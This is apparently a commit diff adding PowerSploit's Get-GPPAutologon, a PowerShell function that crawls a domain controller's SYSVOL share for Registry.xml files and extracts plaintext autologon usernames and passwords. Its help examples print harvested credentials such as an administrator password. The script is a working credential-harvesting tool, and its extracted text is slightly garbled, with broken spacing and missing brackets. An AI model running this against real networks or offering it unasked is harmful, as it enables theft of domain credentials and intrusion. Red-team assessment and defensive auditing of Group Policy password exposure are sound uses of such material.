1+ function Get-GPPAutologon
2+ {
3+ <#
4+ . SYNOPSIS
5+
6+ Retrieves password from Autologon entries that are pushed through Group Policy Registry Preferences.
7+
8+ PowerSploit Function: Get-GPPAutologon
9+ Author: Oddvar Moe (@oddvarmoe)
10+ Based on Get-GPPPassword by Chris Campbell (@obscuresec) - Thanks for your awesome work!
11+ License: BSD 3-Clause
12+ Required Dependencies: None
13+ Optional Dependencies: None
14+
15+ . DESCRIPTION
16+
17+ Get-GPPAutologn searches the domain controller for registry.xml to find autologon information and returns the username and password.
18+
19+ . EXAMPLE
20+
21+ PS C:\> Get-GPPAutolgon
22+
23+ UserNames File Passwords
24+ --------- ---- ---------
25+ {administrator} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {PasswordsAreLam3}
26+ {NormalUser} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {ThisIsAsupaPassword}
27+
28+
29+ . EXAMPLE
30+
31+ PS C:\> Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq
32+
33+ password
34+ password12
35+ password123
36+ password1234
37+ password1234$
38+ read123
39+ Recycling*3ftw!
40+
41+ . LINK
42+
43+ https://support.microsoft.com/nb-no/kb/324737
44+ #>
45+
46+ [CmdletBinding ()]
47+ Param ()
48+
49+ # Some XML issues between versions
50+ Set-StrictMode - Version 2
51+
52+ # define helper function to parse fields from xml files
53+ function Get-GPPInnerFields
54+ {
55+ [CmdletBinding ()]
56+ Param (
57+ $File
58+ )
59+
60+ try
61+ {
62+ $Filename = Split-Path $File - Leaf
63+ [xml ] $Xml = Get-Content ($File )
64+
65+ # declare empty arrays
66+ $Password = @ ()
67+ $UserName = @ ()
68+
69+ # check for password and username field
70+ if (($Xml.innerxml -like " *DefaultPassword*" -and ($Xml.innerxml -like " *DefaultUserName*"
71+ {
72+ $props = $xml.GetElementsByTagName (" Properties"
73+ foreach ($prop in $props )
74+ {
75+ switch ($prop.name )
76+ {
77+ ' DefaultPassword'
78+ {
79+ $Password += , $prop | Select-Object - ExpandProperty Value
80+ }
81+
82+ ' DefaultUsername'
83+ {
84+ $Username += , $prop | Select-Object - ExpandProperty Value
85+ }
86+ }
87+
88+ Write-Verbose " Potential password in $File "
89+ }
90+
91+ # put [BLANK] in variables
92+ if (! ($Password ))
93+ {
94+ $Password = ' [BLANK]'
95+ }
96+
97+ if (! ($UserName ))
98+ {
99+ $UserName = ' [BLANK]'
100+ }
101+
102+ # Create custom object to output results
103+ $ObjectProperties = @ {' Passwords' = $Password ;
104+ ' UserNames' = $UserName ;
105+ ' File' = $File }
106+
107+ $ResultsObject = New-Object - TypeName PSObject - Property $ObjectProperties
108+ Write-Verbose " The password is between {} and may be more than one value."
109+ if ($ResultsObject )
110+ {
111+ Return $ResultsObject
112+ }
113+ }
114+ }
115+ catch {Write-Error $Error [0 ]}
116+ }
117+
118+ try {
119+ # ensure that machine is domain joined and script is running as a domain account
120+ if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env: USERDNSDOMAIN ) ) {
121+ throw ' Machine is not a domain member or User is not a member of the domain.'
122+ }
123+
124+ # discover potential registry.xml containing autologon passwords
125+ Write-Verbose ' Searching the DC. This could take a while.'
126+ $XMlFiles = Get-ChildItem - Path " \\$Env: USERDNSDOMAIN \SYSVOL" - Recurse - ErrorAction SilentlyContinue - Include ' Registry.xml'
127+
128+ if ( -not $XMlFiles ) {throw ' No preference files found.'
129+
130+ Write-Verbose " Found $ ( $XMLFiles | Measure-Object | Select-Object - ExpandProperty Count) files that could contain passwords."
131+
132+ foreach ($File in $XMLFiles ) {
133+ $Result = (Get-GppInnerFields $File.Fullname )
134+ Write-Output $Result
135+ }
136+ }
137+
138+ catch {Write-Error $Error [0 ]}
139+ }
0 commit comments